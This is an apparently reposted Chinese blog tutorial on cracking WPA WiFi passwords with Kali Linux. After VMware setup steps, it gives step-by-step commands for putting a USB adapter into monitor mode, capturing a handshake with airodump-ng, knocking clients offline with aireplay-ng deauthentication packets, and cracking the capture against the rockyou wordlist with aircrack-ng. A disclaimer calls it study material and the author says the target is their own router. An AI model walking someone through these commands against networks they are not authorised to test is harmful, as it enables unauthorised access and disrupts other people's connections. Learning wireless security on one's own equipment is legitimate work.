1. 程式人生 > >安全系列之wifi破解思路

安全系列之wifi破解思路

onf 監控 pen 顯示 ror aircrack HR check 插入

聲明:此文章僅供研究學習和技術交流,請勿用於破解他人 WIFI 密碼!違反法律,一切後果自負!

一.準備工作

1. 硬件準備

  • 無線網卡:一般筆記本自帶的無線網卡不支持監聽模式,所以要使用一個外置的無線網卡,這裏推薦購買3070或者8187芯片的外置USB無線網卡,8187L芯片是一種內含集成電路的矽片,是一種大功率無線網卡的首腦部分,常被用做“蹭網卡”芯片。具有體積小,輻射大,使用價值高等特點。

技術分享圖片

2. 軟件準備

  • 操作系統: https://www.kali.org/downloads/ ,在kail linux上載最新的鏡像,kail linux中自帶很多工具
  • 虛擬機軟件:vmware或virtualbox

二.安裝kail linux

1.在vmare中創建虛擬這步就省略,網絡連接橋接和NAT都可以,只是稍微提註意的是版本選擇是先debian,和在顯示器可以調整開啟“加速3D圖形”,圖形內存改成 “1G”,這是為了以後能使用GPU破解wifi密碼做的準備

技術分享圖片

2. kail linux的過程也是比較長,可以參考官方文檔的https://docs.kali.org/installation/kali-linux-hard-disk-install

三.kail linux上的基本配置

1. 檢查下kail linux的版本

root@kail:~# lsb_release -a
No LSB modules are available.
Distributor ID:	Kali
Description:	Kali GNU/Linux Rolling
Release:	kali-rolling
Codename:	kali-rolling

註釋: Kali雖然是基於Debian的一個linux版本,但它卻不同於Debian7,8,9等這些版本,並且和以前采用的測試方法也不同。不再采用那些,有時被認為是全新的,主流的,有時又是過時的循環軟件測試。Kali Rolling是Debian的即時更新版,只要Debian中有更新,更新包就會放入Kali Rolling中,供用戶下載使用。它為提用戶提供了一個穩定更新的版本,同時會帶有最新的更新安裝包。在過去的5個月中,只要是對該工具進行了更新,系統都會在第一時間自動發出通知,這是Kali Rolling的一大特色。並且確保了Kali Rolling工具庫中的監控工具總是維持在最新版本,為用戶的使用提供了很大的便利。

2.更新系統的安裝源

root@kail:~# vim /etc/apt/sources.list
#ustc
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#aliyun
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

3.更新系統,註意使用的時間比較長,而且如果更新沒完成,可以會導致以下操作中有些工具無法使用

root@kail:~# apt-get update && apt-get upgrade && apt-get dist-upgrade 

報錯處理:
Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) E: Unable to lock the administration di
解決方案:
其實這是因為有另外一個程序在運行,導致鎖不可用。原因可能是上次運行更新或安裝沒有正常完成。解決辦法是殺死此進程
sudo rm /var/cache/apt/archives/lock
sudo rm /var/lib/dpkg/lock
但是這樣不能解決問題:可能還會出現問題,解決方案:
1,sudo dpkg --configure -a
2,sudo apt-get update

4.安裝vmwaretools,完成後並重啟系統

  • 先把虛擬機的鏡像彈出,設置到CD/DVD進行自動檢測,

技術分享圖片

  • 安裝linux的內核頭文件
root@kail:~# apt-get install linux-headers-$(uname -r) 
  • 加載vmware-tools: vmware ----> 點擊導航中的虛擬機---->安裝VMware Tools(T)
  • 安裝vmware tools,以下是針對個人情況,可以參考vm官方文檔
#點擊安裝的按鈕後,軟件會自動掛載
root@kail:~# mount
/dev/sr0 on /media/cdrom0 type iso9660 (ro,nosuid,nodev,noexec,relatime,nojoliet,check=s,map=n,blocksize=2048,user)

root@kail:~# ls /media/cdrom0/
manifest.txt     VMwareTools-10.0.5-3228253.tar.gz  vmware-tools-upgrader-64
run_upgrader.sh  vmware-tools-upgrader-32

#把tool拷貝到自己的目錄下
root@kail:~# cp /media/cdrom0/VMwareTools-10.0.5-3228253.tar.gz /home/
root@kail:~# cd /home/

#解壓安裝
root@kail:/home# tar xf VMwareTools-10.0.5-3228253.tar.gz 
root@kail:/home# cd vmware-tools-distrib/
root@kail:/home/vmware-tools-distrib# ./vmware-install.pl 
Enjoy,
--the VMware team
Found VMware Tools CDROM mounted at /media/cdrom0. Ejecting device /dev/sr0 ...

5.接入8187無線網卡(這步可以事先做好)

  • 插入計算機後,系統會自動安裝驅動,如找不到相應的驅動需要自行上網下載

技術分享圖片

技術分享圖片

  • vmware右下方會出現一個USB形狀的圖標,選擇連接8187(或者導航中的虛擬機--》可移動設備),確保以上都能操作好,否則可以沒法顯示無線網卡

技術分享圖片

四.抓取wifi的數據包

1.檢查無線網卡的狀態(確保可以顯示wlan0)

root@kail:~# iwconfig 
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

註:此時wlan0是manged模式

2. 開啟wlan0的監控模式

root@kail:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run ‘airmon-ng check kill‘

   PID Name
   484 NetworkManager
   523 dhclient
   717 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		rtl8187		Realtek Semiconductor Corp. RTL8187

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

3.監聽周圍的無線

root@kail:~# airodump-ng wlan0mon

註:這裏li是自己路由器,把BSSID和頻道(CH)號,ESSID記錄下來

技術分享圖片

4.使用無線網卡抓取握手包。所謂握手包,就是包含密碼的包,當有新用戶或斷開用戶自動連接wifi時,會發送握手包。

root@kail:~# airodump-ng -c 9 --bssid  B0:48:7A:??:??:?? -w ~/test wlan0mon

-c指定頻道號
bssid指定路由器bssid
w指定抓取的數據包保存位置,~/test表示存在root/目錄下,並且包的名稱以test-xx.cap的格式儲存。

技術分享圖片

5.設法讓設備重新連接wifi,直接出現WPA handshake為止

兩條命令一樣:
root@kail:~# aireplay-ng -0 10 -a B0:48:7A:??:??:?? -c 4C:34:88:??:??:??  wlan0mon
root@kail:~# aireplay-ng -0 5 -a B0:48:7A:??:??:?? wlan0mon (兩個命令都可以,可能要多試幾次)

0表示發起deauthentication攻擊 10代表攻擊10次
a指定無線路由器BSSID,也就是路由器的MAC地址
c指定強制斷開的設備,也就是STATION的MAC地址

註:這裏需要使用重新連接,但是一般情況下等待比較長,因為自身就是設備,可以讓設備自行下線,起deauthentication攻擊,然後抓取它的握手包.aireplay-ng的工具,它可以強制用戶斷開wifi連接,具體方法是:給連接到wifi的一個設備發送一個deauth(反認證)包,讓那個設備斷開wifi,隨後設備會再次連接wifi,這樣我們就能順利而快速的抓到握手包了。

技術分享圖片

技術分享圖片

6.關閉無線網卡監聽模式(抓取到握手包後)

root@kail:~# airmon-ng stop wlan0mon

五.使用kail linux自帶工具破解

1.解壓kail linux自帶密碼字典(註意: 無線的密碼有可能在字典中找不到)

root@kail:~# gzip -d /usr/share/wordlists/rockyou.txt.gz

2.分析破解握手包中的密碼

root@kail:~# aircrack-ng -a2 -b  B0:48:??:??:???? -w /usr/share/wordlists/rockyou.txt ~/test-01.cap 

參數解釋:
a2代表WPA的握手包
b指定要破解的wifi BSSID。
w指定字典文件
最後是抓取的包路徑

3. 以下的破解的過程,花費了三個多小時,最終沒有破解成功

技術分享圖片

技術分享圖片

安全系列之wifi破解思路